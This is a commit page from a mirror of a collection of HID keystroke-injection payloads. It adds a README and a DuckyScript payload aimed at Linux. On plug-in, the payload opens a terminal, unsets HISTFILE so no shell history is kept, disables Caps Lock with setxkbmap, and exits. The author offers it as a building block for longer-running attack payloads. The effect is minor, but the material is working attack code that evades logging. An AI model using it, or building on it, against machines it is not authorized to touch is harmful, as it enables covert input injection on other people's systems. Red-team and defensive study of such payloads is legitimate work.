mirror of https://github.com/hak5/omg-payloads.git
upload CAPSLOCK_DISABLE payload
capslock_disable disables capslock on target’s system. Can be used as module to craft payloads which requires long time to execute.pull/190/head
parent
146743ef64
commit
3e231ab9b8
|
@ -0,0 +1,19 @@
|
||||||
|
## About
|
||||||
|
# Title: capslock_disable
|
||||||
|
# Description: capslock_disable disables capslock on target's system.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: GNU/Linux.
|
||||||
|
# Attackmodes: HID.
|
||||||
|
|
||||||
|
## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
1. Executing Terminal Emulator.
|
||||||
|
2. Prevent storing history.
|
||||||
|
3. Executing command which disables capslock.
|
||||||
|
4. Terminating terminal instance.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,16 @@
|
||||||
|
REM Title: capslock_disable
|
||||||
|
REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Execution
|
||||||
|
REM Target: GNU/Linux.
|
||||||
|
REM Attackmodes: HID.
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 500
|
||||||
|
STRING unset HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING setxkbmap -option ctrl:nocaps && exit
|
||||||
|
ENTER
|
Loading…
Reference in New Issue